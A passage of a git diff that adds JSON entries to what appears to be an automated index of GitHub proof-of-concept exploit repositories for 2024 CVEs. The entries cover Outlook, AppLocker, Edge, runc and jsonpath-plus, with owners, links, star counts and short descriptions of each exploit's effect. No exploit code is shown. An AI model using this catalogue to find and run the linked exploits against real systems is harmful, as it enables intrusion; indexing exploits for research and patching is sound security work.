141570642, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/141570642?v=4", + "html_url": "https:\/\/github.com\/Zombie-Kaiser", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Zombie-Kaiser\/CVE-2024-21338-x64-build-", + "description": "Local Privilege Escalation from Admin to Kernel vulnerability on Windows 10 and Windows 11 operating systems with HVCI enabled.", + "fork": false, + "created_at": "2024-05-18T15:38:34Z", + "updated_at": "2024-08-24T14:07:41Z", + "pushed_at": "2024-05-22T17:06:06Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 818876565, + "name": "CVE-2024-21338_PoC", + "full_name": "tykawaii98\/CVE-2024-21338_PoC", + "owner": { + "login": "tykawaii98", + "id": 45362197, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45362197?v=4", + "html_url": "https:\/\/github.com\/tykawaii98", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tykawaii98\/CVE-2024-21338_PoC", + "description": null, + "fork": false, + "created_at": "2024-06-23T06:03:44Z", + "updated_at": "2024-11-20T16:30:51Z", + "pushed_at": "2024-06-23T06:09:10Z", + "stargazers_count": 38, + "watchers_count": 38, + "has_discussions": false, + "forks_count": 13, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 13, + "watchers": 38, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 835255581, + "name": "CVE-2024-21338", + "full_name": "Crowdfense\/CVE-2024-21338", + "owner": { + "login": "Crowdfense", + "id": 176018566, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/176018566?v=4", + "html_url": "https:\/\/github.com\/Crowdfense", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Crowdfense\/CVE-2024-21338", + "description": "Windows AppLocker Driver (appid.sys) LPE", + "fork": false, + "created_at": "2024-07-29T13:18:06Z", + "updated_at": "2024-11-25T16:40:52Z", + "pushed_at": "2024-07-29T13:29:59Z", + "stargazers_count": 41, + "watchers_count": 41, + "has_discussions": false, + "forks_count": 13, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "exploit", + "kernel", + "lpe", + "windowd" + ], + "visibility": "public", + "forks": 13, + "watchers": 41, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-21345.json b/2024/CVE-2024-21345.json new file mode 100644 index 0000000000..3675cbf50b --- /dev/null +++ b/2024/CVE-2024-21345.json @@ -0,0 +1,64 @@ +[ + { + "id": 792426232, + "name": "CVE-2024-21345", + "full_name": "exploits-forsale\/CVE-2024-21345", + "owner": { + "login": "exploits-forsale", + "id": 168065072, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/168065072?v=4", + "html_url": "https:\/\/github.com\/exploits-forsale", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/exploits-forsale\/CVE-2024-21345", + "description": "Proof-of-Concept for CVE-2024-21345", + "fork": false, + "created_at": "2024-04-26T16:38:17Z", + "updated_at": "2024-11-20T16:30:45Z", + "pushed_at": "2024-04-26T16:39:48Z", + "stargazers_count": 69, + "watchers_count": 69, + "has_discussions": false, + "forks_count": 20, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 20, + "watchers": 69, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 793265049, + "name": "CVE-2024-21345", + "full_name": "FoxyProxys\/CVE-2024-21345", + "owner": { + "login": "FoxyProxys", + "id": 166161106, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/166161106?v=4", + "html_url": "https:\/\/github.com\/FoxyProxys", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/FoxyProxys\/CVE-2024-21345", + "description": null, + "fork": false, + "created_at": "2024-04-28T21:36:33Z", + "updated_at": "2024-04-28T21:44:18Z", + "pushed_at": "2024-04-28T21:44:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-21378.json b/2024/CVE-2024-21378.json new file mode 100644 index 0000000000..f530ba01ef --- /dev/null +++ b/2024/CVE-2024-21378.json @@ -0,0 +1,33 @@ +[ + { + "id": 770999935, + "name": "CVE-2024-21378", + "full_name": "d0rb\/CVE-2024-21378", + "owner": { + "login": "d0rb", + "id": 10403781, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10403781?v=4", + "html_url": "https:\/\/github.com\/d0rb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/d0rb\/CVE-2024-21378", + "description": "This repository contains an exploit for targeting Microsoft Outlook through Exchange Online, leveraging a vulnerability to execute arbitrary code via COM DLLs. The exploit utilizes a modified version of Ruler to send a malicious form as an email, triggering the execution upon user interaction within the Outlook thick client.", + "fork": false, + "created_at": "2024-03-12T14:11:58Z", + "updated_at": "2024-11-20T12:18:21Z", + "pushed_at": "2024-03-13T18:34:57Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-21388.json b/2024/CVE-2024-21388.json new file mode 100644 index 0000000000..bd145f4076 --- /dev/null +++ b/2024/CVE-2024-21388.json @@ -0,0 +1,33 @@ +[ + { + "id": 778727781, + "name": "CVE-2024-21388", + "full_name": "d0rb\/CVE-2024-21388", + "owner": { + "login": "d0rb", + "id": 10403781, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10403781?v=4", + "html_url": "https:\/\/github.com\/d0rb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/d0rb\/CVE-2024-21388", + "description": "This Python script exploits a vulnerability (CVE-2024-21388) in Microsoft Edge, allowing silent installation of browser extensions with elevated privileges via a private API.", + "fork": false, + "created_at": "2024-03-28T09:31:31Z", + "updated_at": "2024-10-21T18:27:54Z", + "pushed_at": "2024-03-28T09:33:23Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-21412.json b/2024/CVE-2024-21412.json new file mode 100644 index 0000000000..3b499dc152 --- /dev/null +++ b/2024/CVE-2024-21412.json @@ -0,0 +1,38 @@ +[ + { + "id": 775557259, + "name": "CVE-2024-21412_Water-Hydra", + "full_name": "lsr00ter\/CVE-2024-21412_Water-Hydra", + "owner": { + "login": "lsr00ter", + "id": 3685107, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3685107?v=4", + "html_url": "https:\/\/github.com\/lsr00ter", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lsr00ter\/CVE-2024-21412_Water-Hydra", + "description": "POC code according to trendmicro's research", + "fork": false, + "created_at": "2024-03-21T15:57:51Z", + "updated_at": "2024-08-16T04:58:26Z", + "pushed_at": "2024-03-21T16:02:54Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "initial-access", + "malware", + "redteam", + "windows" + ], + "visibility": "public", + "forks": 3, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-21413.json b/2024/CVE-2024-21413.json new file mode 100644 index 0000000000..de5db5aee2 --- /dev/null +++ b/2024/CVE-2024-21413.json @@ -0,0 +1,467 @@ +[ + { + "id": 758191027, + "name": "CVE-2024-21413", + "full_name": "duy-31\/CVE-2024-21413", + "owner": { + "login": "duy-31", + "id": 20819326, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20819326?v=4", + "html_url": "https:\/\/github.com\/duy-31", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/duy-31\/CVE-2024-21413", + "description": "Microsoft Outlook Information Disclosure Vulnerability (leak password hash) - Expect Script POC", + "fork": false, + "created_at": "2024-02-15T19:57:38Z", + "updated_at": "2024-11-06T01:28:23Z", + "pushed_at": "2024-02-17T07:08:49Z", + "stargazers_count": 154, + "watchers_count": 154, + "has_discussions": false, + "forks_count": 32, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 32, + "watchers": 154, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 758555813, + "name": "CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability", + "full_name": "xaitax\/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability", + "owner": { + "login": "xaitax", + "id": 5014849, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5014849?v=4", + "html_url": "https:\/\/github.com\/xaitax", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xaitax\/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability", + "description": "Microsoft-Outlook-Remote-Code-Execution-Vulnerability", + "fork": false, + "created_at": "2024-02-16T15:17:59Z", + "updated_at": "2024-11-28T01:38:26Z", + "pushed_at": "2024-02-19T20:00:35Z", + "stargazers_count": 704, + "watchers_count": 704, + "has_discussions": false, + "forks_count": 153, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 153, + "watchers": 704, + "score": 0, + "subscribers_count": 10 + }, + { + "id": 758688293, + "name": "CVE-2024-21413-POC", + "full_name": "r00tb1t\/CVE-2024-21413-POC", + "owner": { + "login": "r00tb1t", + "id": 150359865, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/150359865?v=4", + "html_url": "https:\/\/github.com\/r00tb1t", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/r00tb1t\/CVE-2024-21413-POC", + "description": "Microsoft Outlook Information Disclosure Vulnerability (leak password hash) - CVE-2024-21413 POC", + "fork": false, + "created_at": "2024-02-16T21:10:31Z", + "updated_at": "2024-07-23T13:37:41Z", + "pushed_at": "2024-02-16T22:23:37Z", + "stargazers_count": 16, + "watchers_count": 16, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 16, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 758949379, + "name": "CVE-2024-21413", + "full_name": "CMNatic\/CVE-2024-21413", + "owner": { + "login": "CMNatic", + "id": 4163116, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4163116?v=4", + "html_url": "https:\/\/github.com\/CMNatic", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CMNatic\/CVE-2024-21413", + "description": "CVE-2024-21413 PoC for THM Lab", + "fork": false, + "created_at": "2024-02-17T14:52:52Z", + "updated_at": "2024-11-26T00:31:13Z", + "pushed_at": "2024-03-13T02:44:28Z", + "stargazers_count": 51, + "watchers_count": 51, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 11, + "watchers": 51, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 759610035, + "name": "CVE-2024-21413", + "full_name": "MSeymenD\/CVE-2024-21413", + "owner": { + "login": "MSeymenD", + "id": 83572774, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83572774?v=4", + "html_url": "https:\/\/github.com\/MSeymenD", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MSeymenD\/CVE-2024-21413", + "description": "CVE-2024-21413 Açığını Kullanarak Giriş Bilgilerini Alma", + "fork": false, + "created_at": "2024-02-19T01:37:15Z", + "updated_at": "2024-02-19T01:48:46Z", + "pushed_at": "2024-02-19T01:54:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 760445057, + "name": "CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability", + "full_name": "Mdusmandasthaheer\/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability", + "owner": { + "login": "Mdusmandasthaheer", + "id": 122736342, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/122736342?v=4", + "html_url": "https:\/\/github.com\/Mdusmandasthaheer", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mdusmandasthaheer\/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability", + "description": null, + "fork": false, + "created_at": "2024-02-20T12:41:15Z", + "updated_at": "2024-10-18T18:45:47Z", + "pushed_at": "2024-02-20T13:37:39Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 762261193, + "name": "CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability", + "full_name": "ahmetkarakayaoffical\/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability", + "owner": { + "login": "ahmetkarakayaoffical", + "id": 100443477, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100443477?v=4", + "html_url": "https:\/\/github.com\/ahmetkarakayaoffical", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ahmetkarakayaoffical\/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability", + "description": "Bu betik, Microsoft Outlook'ta keşfedilen ve CVSS değeri 9.8 olan önemli bir güvenlik açığı olan CVE-2024-21413 için bir kavram kanıtı (PoC) sunmaktadır. MonikerLink hatası olarak adlandırılan bu güvenlik açığı, yerel NTLM bilgilerinin potansiyel sızıntısı ve uzaktan kod çalıştırma olasılığı dahil olmak üzere geniş kapsamlı etkilere sahiptir.", + "fork": false, + "created_at": "2024-02-23T12:13:11Z", + "updated_at": "2024-10-12T07:56:40Z", + "pushed_at": "2024-02-24T15:36:22Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 765116138, + "name": "CVE-2024-21413", + "full_name": "dshabani96\/CVE-2024-21413", + "owner": { + "login": "dshabani96", + "id": 107131685, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/107131685?v=4", + "html_url": "https:\/\/github.com\/dshabani96", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dshabani96\/CVE-2024-21413", + "description": null, + "fork": false, + "created_at": "2024-02-29T10:07:34Z", + "updated_at": "2024-03-13T04:12:36Z", + "pushed_at": "2024-02-29T13:22:17Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 795596778, + "name": "CVE-2024-21413-Microsoft-Outlook-RCE-Exploit", + "full_name": "X-Projetion\/CVE-2024-21413-Microsoft-Outlook-RCE-Exploit", + "owner": { + "login": "X-Projetion", + "id": 161194427, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/161194427?v=4", + "html_url": "https:\/\/github.com\/X-Projetion", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/X-Projetion\/CVE-2024-21413-Microsoft-Outlook-RCE-Exploit", + "description": "CVE-2024-21413 Microsoft Outlook RCE Exploit", + "fork": false, + "created_at": "2024-05-03T16:09:54Z", + "updated_at": "2024-11-06T05:33:54Z", + "pushed_at": "2024-05-03T16:11:46Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 799194864, + "name": "CVE-2024-21413", + "full_name": "th3Hellion\/CVE-2024-21413", + "owner": { + "login": "th3Hellion", + "id": 93284551, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93284551?v=4", + "html_url": "https:\/\/github.com\/th3Hellion", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/th3Hellion\/CVE-2024-21413", + "description": null, + "fork": false, + "created_at": "2024-05-11T12:28:22Z", + "updated_at": "2024-05-11T12:34:27Z", + "pushed_at": "2024-05-11T12:34:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 816689478, + "name": "CVE-2024-21413", + "full_name": "ShubhamKanhere307\/CVE-2024-21413", + "owner": { + "login": "ShubhamKanhere307", + "id": 173140854, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/173140854?v=4", + "html_url": "https:\/\/github.com\/ShubhamKanhere307", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ShubhamKanhere307\/CVE-2024-21413", + "description": "This script is the Proof of Concept (PoC) of the CVE-2024-21413, a significant security vulnerability discovered in the Microsoft Windows Outlook having a strong 9.8 critical CVSS score. Named as #MonikerLink Bug, this vulnerability allows the attacker to execute the arbitrary code remotely on the victim's machine, thus becomes a full-fledged RCE. ", + "fork": false, + "created_at": "2024-06-18T08:11:33Z", + "updated_at": "2024-06-18T08:18:16Z", + "pushed_at": "2024-06-18T08:18:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 821343809, + "name": "CVE-2024-21413", + "full_name": "olebris\/CVE-2024-21413", + "owner": { + "login": "olebris", + "id": 78493240, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78493240?v=4", + "html_url": "https:\/\/github.com\/olebris", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/olebris\/CVE-2024-21413", + "description": "CVE-2024-21413 PoC", + "fork": false, + "created_at": "2024-06-28T10:27:34Z", + "updated_at": "2024-06-28T10:27:55Z", + "pushed_at": "2024-06-28T10:27:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 822078685, + "name": "CVE-2024-21413", + "full_name": "DerZiad\/CVE-2024-21413", + "owner": { + "login": "DerZiad", + "id": 40337316, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40337316?v=4", + "html_url": "https:\/\/github.com\/DerZiad", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DerZiad\/CVE-2024-21413", + "description": "This is a mailer that use console prompt to exploit this vulnerability", + "fork": false, + "created_at": "2024-06-30T08:53:46Z", + "updated_at": "2024-06-30T08:53:50Z", + "pushed_at": "2024-06-30T11:10:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": true, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 823551343, + "name": "Unveiling-Moniker-Link-CVE-2024-21413-Navigating-the-Latest-Cybersecurity-Landscape", + "full_name": "Redfox-Secuirty\/Unveiling-Moniker-Link-CVE-2024-21413-Navigating-the-Latest-Cybersecurity-Landscape", + "owner": { + "login": "Redfox-Secuirty", + "id": 173128884, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/173128884?v=4", + "html_url": "https:\/\/github.com\/Redfox-Secuirty", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Redfox-Secuirty\/Unveiling-Moniker-Link-CVE-2024-21413-Navigating-the-Latest-Cybersecurity-Landscape", + "description": null, + "fork": false, + "created_at": "2024-07-03T08:45:05Z", + "updated_at": "2024-07-03T08:45:08Z", + "pushed_at": "2024-07-03T08:45:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 850327133, + "name": "CVE-2024-21413", + "full_name": "ThemeHackers\/CVE-2024-21413", + "owner": { + "login": "ThemeHackers", + "id": 107047730, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/107047730?v=4", + "html_url": "https:\/\/github.com\/ThemeHackers", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ThemeHackers\/CVE-2024-21413", + "description": "CVE-2024-21413 | Microsoft Outlook Remote Code Execution Vulnerability PoC", + "fork": false, + "created_at": "2024-08-31T13:18:43Z", + "updated_at": "2024-10-25T10:52:39Z", + "pushed_at": "2024-10-24T16:38:25Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-21514.json b/2024/CVE-2024-21514.json new file mode 100644 index 0000000000..5d4fae1bd0 --- /dev/null +++ b/2024/CVE-2024-21514.json @@ -0,0 +1,33 @@ +[ + { + "id": 818819540, + "name": "CVE-2024-21514", + "full_name": "bigb0x\/CVE-2024-21514", + "owner": { + "login": "bigb0x", + "id": 13532434, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13532434?v=4", + "html_url": "https:\/\/github.com\/bigb0x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bigb0x\/CVE-2024-21514", + "description": "SQL Injection POC for CVE-2024-21514: Divido payment extension for OpenCart", + "fork": false, + "created_at": "2024-06-23T00:55:00Z", + "updated_at": "2024-06-26T04:27:50Z", + "pushed_at": "2024-06-23T01:08:17Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-21520.json b/2024/CVE-2024-21520.json new file mode 100644 index 0000000000..15c45e1e62 --- /dev/null +++ b/2024/CVE-2024-21520.json @@ -0,0 +1,33 @@ +[ + { + "id": 805957479, + "name": "CVE-2024-21520-Demo", + "full_name": "ch4n3-yoon\/CVE-2024-21520-Demo", + "owner": { + "login": "ch4n3-yoon", + "id": 13852925, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13852925?v=4", + "html_url": "https:\/\/github.com\/ch4n3-yoon", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ch4n3-yoon\/CVE-2024-21520-Demo", + "description": "A demonstration of common XSS vulnerabilities in Django Rest Framework applications. This repository showcases intentionally vulnerable code to educate developers on identifying and mitigating XSS attacks in DRF-based projects. For educational purposes only.", + "fork": false, + "created_at": "2024-05-26T00:30:12Z", + "updated_at": "2024-07-13T03:42:36Z", + "pushed_at": "2024-05-26T01:04:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-21534.json b/2024/CVE-2024-21534.json new file mode 100644 index 0000000000..2d2cdb4c35 --- /dev/null +++ b/2024/CVE-2024-21534.json @@ -0,0 +1,106 @@ +[ + { + "id": 887743822, + "name": "CVE-2024-21534", + "full_name": "pabloopez\/CVE-2024-21534", + "owner": { + "login": "pabloopez", + "id": 56795889, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56795889?v=4", + "html_url": "https:\/\/github.com\/pabloopez", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pabloopez\/CVE-2024-21534", + "description": "Proof-of-concept (PoC) exploit for JSONPath-plus vulnerability", + "fork": false, + "created_at": "2024-11-13T07:56:10Z", + "updated_at": "2024-11-27T08:01:39Z", + "pushed_at": "2024-11-27T08:01:35Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 892949211, + "name": "cve-2024-21534-poc", + "full_name": "XiaomingX\/cve-2024-21534-poc", + "owner": { + "login": "XiaomingX", + "id": 5387930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5387930?v=4", + "html_url": "https:\/\/github.com\/XiaomingX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/XiaomingX\/cve-2024-21534-poc", + "description": "jsonpath-plus 包(版本 <=10.0.7)存在严重的远程代码执行(RCE)漏洞,允许攻击者通过 Node.js 的 VM 模块执行任意代码。该漏洞由于输入验证不严格导致,影响版本为 10.0.7 以下,CVSS 分数为 9.8(极其严重)。漏洞首次公开于 2024 年 10 月 11 日。", + "fork": false, + "created_at": "2024-11-23T05:54:24Z", + "updated_at": "2024-11-25T05:24:15Z", + "pushed_at": "2024-11-23T05:57:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "exp", + "poc", + "rce" + ], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 895697212, + "name": "cve-2024-21534", + "full_name": "verylazytech\/cve-2024-21534", + "owner": { + "login": "verylazytech", + "id": 172168670, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/172168670?v=4", + "html_url": "https:\/\/github.com\/verylazytech", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/verylazytech\/cve-2024-21534", + "description": "POC - CVE-2024-21534 Jsonpath-plus vulnerable to Remote Code Execution (RCE) due to improper input sanitization", + "fork": false, + "created_at": "2024-11-28T17:47:53Z", + "updated_at": "2024-11-28T18:26:09Z", + "pushed_at": "2024-11-28T18:07:14Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-21534", + "jsonpath", + "rce", + "rce-exploit", + "remote-code-execution", + "sanitization" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-21626.json b/2024/CVE-2024-21626.json new file mode 100644 index 0000000000..de986f442f --- /dev/null +++ b/2024/CVE-2024-21626.json @@ -0,0 +1,436 @@ +[ + { + "id": 751354058, + "name": "CVE-2024-21626-POC", + "full_name": "zpxlz\/CVE-2024-21626-POC", + "owner": { + "login": "zpxlz", + "id": 89461075, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89461075?v=4", + "html_url": "https:\/\/github.com\/zpxlz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zpxlz\/CVE-2024-21626-POC", + "description": null, + "fork": false, + "created_at": "2024-02-01T12:53:18Z", + "updated_at": "2024-02-02T09:26:46Z", + "pushed_at": "2024-02-01T20:19:03Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 751422888, + "name": "CVE-2024-21626", + "full_name": "NitroCao\/CVE-2024-21626", + "owner": { + "login": "NitroCao", + "id": 17915615, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17915615?v=4", + "html_url": "https:\/\/github.com\/NitroCao", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/NitroCao\/CVE-2024-21626", + "description": "PoC and Detection for CVE-2024-21626", + "fork": false, + "created_at": "2024-02-01T15:28:37Z", + "updated_at": "2024-11-21T08:57:55Z", + "pushed_at": "2024-02-06T16:09:05Z", + "stargazers_count": 70, + "watchers_count": 70, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 11, + "watchers": 70, + "score": 0, + "subscribers_count": 3 